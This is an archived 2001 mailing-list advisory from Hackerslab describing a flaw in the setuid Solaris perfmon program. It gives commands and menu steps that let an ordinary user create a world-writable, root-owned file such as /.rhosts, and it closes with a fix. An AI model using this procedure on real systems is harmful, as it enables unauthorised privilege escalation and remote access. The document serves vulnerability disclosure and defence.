OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: (s96192CE.HANNAM.AC.KR)
Date: Fri Mar 23 2001 - 02:11:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ==============================================================================

           [ Hackerslab bug_paper ] SunOS application perfmon vulnerability

    ==============================================================================

    File : /opt/JSParm/bin/perfmon

    SYSTEM : Solaris 2.X

    INFO :

    parm is a program that displays system information .
    parm is SunOS application. It's not included in Solaris basic package.

    There is a vulneribility in perfmon program that you can create
    any file with root privilege as follow:

    $ whoami
    loveyou
    $ umask 0000
    $ /opt/JSparm/bin/perfmon &

    Choose Logging -> Logging File
    In Selection part, input the file path you want to create
    ex:) /.rhosts

    following file is created in a second.
    -rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost

    SOLUTION :

    remove setuid permition, contact your vendor and get a patch.

    ==-------------------------------------------------------------------------------==
           ********
       * ** ** *
     * ** ** *
    * ****** *
     * ** ** * loveyouhackerslab.org
       * ** ** * [ http://www.hackerslab.org ]
           ******** HACKERSLAB (C) since 1999
    ==-------------------------------------------------------------------------------==